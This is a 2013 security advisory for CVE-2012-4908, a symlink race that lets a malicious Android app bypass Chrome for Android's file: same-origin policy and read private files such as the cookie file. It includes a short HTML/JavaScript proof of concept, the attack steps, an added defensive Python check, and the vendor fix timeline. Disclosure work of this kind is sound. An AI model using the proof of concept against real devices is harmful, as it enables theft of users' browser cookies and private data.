Chrome For Android Bypassing SOP Flaw

Published: 08 Jan 2013 00:00:00. Reported by Takeshi Terada. Type: packetstorm. Source: packetstormsecurity.com. 45 views.

Chrome for Android SOP Bypass via Symbolic Links - Theft of Private File

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2012-4908 | 12 Sep 2012 00:00 | circl |
| CVE | CVE-2012-4908 | 13 Sep 2012 20:00 | cve |
| Cvelist | CVE-2012-4908 | 13 Sep 2012 20:00 | cvelist |
| Debian CVE | CVE-2012-4908 | 13 Sep 2012 20:00 | debiancve |
| EUVD | EUVD-2012-4833 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2012-4908 | 13 Sep 2012 20:55 | nvd |
| Prion | Design/Logic Flaw | 13 Sep 2012 20:55 | prion |
| RedhatCVE | CVE-2012-4908 | 22 May 2025 05:36 | redhatcve |
| securityvulns | Chrome for Android - Bypassing SOP for Local Files By Symlinks | 10 Jan 2013 00:00 | securityvulns |
| securityvulns | Google Chrome for Android multiple security vulnerabilities | 10 Jan 2013 00:00 | securityvulns |
CVE Number: CVE-2012-4908
Title: Chrome for Android - Bypassing SOP for Local Files By Symlinks
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released, which fixes this vulnerability

Overview:
Chrome for Android's Same-Origin Policy for local files (file: URI) can be
bypassed by using symbolic links. This results in theft of Chrome's private
files by malicious Android apps.

Details:
Chrome for Android seems to forbid a local file from reading another file,
except for the originating file itself.

http://code.google.com/p/chromium/issues/detail?id=37586

However, it is possible to circumvent this restriction with a trick using a
symbolic link.

This issue enables malicious Android apps to steal Chrome's private
files such as Chrome's Cookie file, bookmark file, and so on.

As an example, the steps to steal Chrome's Cookie file are described below:

1. An attacker's app creates a malicious HTML file and makes Chrome load
its URL via a file: URI. The malicious HTML contains JavaScript code
which, a few seconds later, tries to read the content of the same URL as
the malicious HTML itself via XMLHttpRequest.

```html
<body>
<u>Wait a few seconds.</u>
<script>
// Re-read this document's own URL after a delay; by then the file at that
// path has been swapped for a symlink (step 2 below).
function doitjs() {
  var xhr = new XMLHttpRequest();
  xhr.onload = function() {
    alert(xhr.responseText);
  };
  xhr.open('GET', document.URL);
  xhr.send(null);
}
setTimeout(doitjs, 8000);
</script>
</body>
```

2. Before the XHR fires, the attacker's app replaces the malicious
HTML file with a symlink pointing to Chrome's Cookie file.

3. When the XHR fires, Chrome follows the symlink and provides the
content of Chrome's Cookie file to the malicious HTML.

The attacker's app can also get the content of Chrome's other private
files in a similar manner.
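The race in steps 1 to 3 is an origin check at load time followed by an unchecked read at XHR time: the path is the same, but the file behind it is not. The following is an added example, not Chromium's code or its actual fix, of a file:-origin loader that records the device and inode of the document it served and refuses a later same-URL read that hits a symlink or a different file; the `FileOrigin` class, the `demo` function and the sample file names are constructed for illustration.

```python
import os
import stat
import tempfile

class FileOrigin:
    """Hypothetical file:-origin loader that remembers which file it served."""

    def __init__(self, path):
        # Never follow symlinks; record the file's identity, not just its path.
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
        with os.fdopen(fd, "rb") as f:
            st = os.fstat(f.fileno())
            self.path, self.identity = path, (st.st_dev, st.st_ino)
            self.content = f.read()

    def read_same_url(self, path):
        """Serve a later read of the document's own URL only while the path
        still names the very file that was loaded (same device and inode)."""
        if path != self.path:
            raise PermissionError("read of another file: blocked")
        try:
            fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # ELOOP on a symlink
        except OSError as exc:
            raise PermissionError("path is now a symlink: blocked") from exc
        with os.fdopen(fd, "rb") as f:
            st = os.fstat(f.fileno())
            if not stat.S_ISREG(st.st_mode) or (st.st_dev, st.st_ino) != self.identity:
                raise PermissionError("file was replaced since load: blocked")
            return f.read()

def demo():
    """Constructed replay of the advisory's steps: load, swap in a symlink, re-read."""
    with tempfile.TemporaryDirectory() as d:
        page, cookie = os.path.join(d, "evil.html"), os.path.join(d, "Cookies")
        with open(page, "w") as f:
            f.write("<script>/* step 1 */</script>")
        with open(cookie, "w") as f:
            f.write("session=secret")  # stands in for Chrome's private file
        origin = FileOrigin(page)
        first = origin.read_same_url(page)  # still the same file: allowed
        os.remove(page)
        os.symlink(cookie, page)  # step 2: the attacker's app swaps in a symlink
        try:
            origin.read_same_url(page)  # step 3: must not return the cookie file
            leaked = True
        except PermissionError:
            leaked = False
        return first, leaked
```

Checking identity rather than path also catches a hard link to the target, since the linked file carries a different inode from the one recorded at load.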
  
Proof of Concept:
The HTML/JavaScript is shown above. At present I do not have plans to disclose
a PoC of the malicious Android app.

Timeline:
2012/08/19 Reported to Google security team
2012/08/25 Re-reported to Chrome security team
2012/09/12 Vendor announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144866

08 Jan 2013 00:00 (current). Vulners AI Score: 0.3 (low risk). EPSS: 0.03629. Views: 45.